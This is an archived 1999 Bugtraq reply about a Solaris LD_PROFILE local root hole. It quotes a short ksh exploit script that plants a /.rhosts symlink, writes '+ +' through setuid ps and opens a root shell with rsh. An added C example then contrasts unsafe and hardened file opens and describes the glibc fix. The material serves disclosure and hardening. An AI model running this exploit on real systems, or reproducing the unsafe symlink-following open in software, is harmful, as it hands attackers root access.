[11999] in bugtraq


Re: LD_PROFILE local root exploit for solaris 2.6

daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Sun Sep 26 02:57:01 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <19990925021531.24E.0@bobanek.nowhere.cz>
Date:         Sat, 25 Sep 1999 02:25:52 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19990922211439.A654@tightrope.demon.co.uk>

On Wed, 22 Sep 1999, Steve Mynott wrote:

> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> #  LD_PROFILE local root exploit for solaris
> #  steve@tightrope.demon.co.uk 19990922
> umask 000                           # inherited by the setuid ps: the file it creates is world-writable
> ln -s /.rhosts /var/tmp/ps.profile  # where the runtime linker writes the profile for "ps"
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps                         # setuid root; ld.so follows the symlink and creates /.rhosts
> echo + + >  /.rhosts                # now writable by us: trust every host and user
> rsh -l root localhost csh -i

Old news. I discovered this problem and informed Sun about it in
June 1998. I cannot verify it right now but I think they have already made
a patch for it.

GNU libc 2.something used to be affected as well. The odds are other
platforms having this particular nifty feature (if they exist at all) are
still vulnerable because I forgot to tell Bugtraq about it.
Oh, mea culpa! :)

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
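The step that makes the posted script work is a privileged process (the runtime linker inside setuid ps) creating a predictably named file in a world-writable directory and following whatever symlink an unprivileged user left there. The C below is an added example, not code from the original post or from Sun's or glibc's fixes: it models that file-creation step in its unsafe and hardened forms and drives both against a planted symlink in a scratch directory. All paths and names, the "victim" file standing in for /.rhosts, and the uid/euid comparison used as a secure-mode check are stand-ins introduced here.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (what the exploit relies on): open(O_CREAT|O_TRUNC) on a
 * predictable path in a world-writable directory follows any symlink planted
 * there and creates or truncates its target with the caller's privileges
 * and inherited umask. */
int profile_open_unsafe(const char *dir, const char *name)
{
    char path[4096];
    snprintf(path, sizeof path, "%s/%s.profile", dir, name);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened pattern: refuse under elevated privileges (uid/euid test is a
 * stand-in for the loader's real secure-mode flag), reject names that escape
 * the directory, never follow a symlink at the last component, never reuse
 * an existing file, and create it 0600 regardless of umask. */
int profile_open_safe(const char *dir, const char *name)
{
    if (getuid() != geteuid() || getgid() != getegid()) {
        errno = EPERM;
        return -1;
    }
    if (strchr(name, '/') != NULL) {
        errno = EINVAL;
        return -1;
    }
    char path[4096];
    snprintf(path, sizeof path, "%s/%s.profile", dir, name);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Attacker's step, as in the posted script: <dir>/<name>.profile -> target. */
static int plant_symlink(const char *dir, const char *name, const char *target)
{
    char link[4096];
    snprintf(link, sizeof link, "%s/%s.profile", dir, name);
    unlink(link);                       /* may not exist yet; ignore failure */
    return symlink(target, link);
}

/* Returns 1 if the unsafe open wrote through the symlink into the target
 * (the equivalent of /.rhosts appearing), 0 if not, -1 on setup failure. */
int unsafe_follows_symlink(const char *dir)
{
    char target[4096];
    snprintf(target, sizeof target, "%s/victim", dir);
    unlink(target);
    if (plant_symlink(dir, "ps", target) != 0)
        return -1;
    int fd = profile_open_unsafe(dir, "ps");
    if (fd < 0)
        return 0;
    (void)write(fd, "+ +\n", 4);       /* data written by the "privileged" side */
    close(fd);
    struct stat st;
    return lstat(target, &st) == 0 && S_ISREG(st.st_mode) && st.st_size == 4;
}

/* Returns 1 if the hardened open refused the planted symlink, 0 if it opened
 * anyway, -1 on setup failure. */
int safe_refuses_symlink(const char *dir)
{
    char target[4096];
    snprintf(target, sizeof target, "%s/victim", dir);
    unlink(target);
    if (plant_symlink(dir, "ps", target) != 0)
        return -1;
    int fd = profile_open_safe(dir, "ps");
    if (fd >= 0) {
        close(fd);
        return 0;
    }
    return errno == EEXIST || errno == ELOOP;
}

/* Private scratch directory standing in for /var/tmp; created once. */
const char *make_workdir(void)
{
    static char tmpl[] = "/tmp/ldprof.XXXXXX";
    static char *dir = NULL;
    if (dir == NULL)
        dir = mkdtemp(tmpl);
    return dir;
}

int main(void)
{
    const char *dir = make_workdir();
    if (dir == NULL) {
        perror("mkdtemp");
        return 1;
    }
    printf("unsafe open followed planted symlink:   %d\n", unsafe_follows_symlink(dir));
    printf("hardened open refused planted symlink:  %d\n", safe_refuses_symlink(dir));
    return 0;
}
```

The uid/euid comparison only approximates the loader's real secure-mode flag (on Linux, AT_SECURE supplied by the kernel), and opening the file more carefully is the lesser fix: O_EXCL|O_NOFOLLOW stops the clobbering, but an attacker who pre-creates the file still denies the write, and the predictable name remains. The stronger fix, which is what glibc applies to LD_PROFILE today, is to drop the variable from the environment of set-user-ID programs so the privileged open never happens at all.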
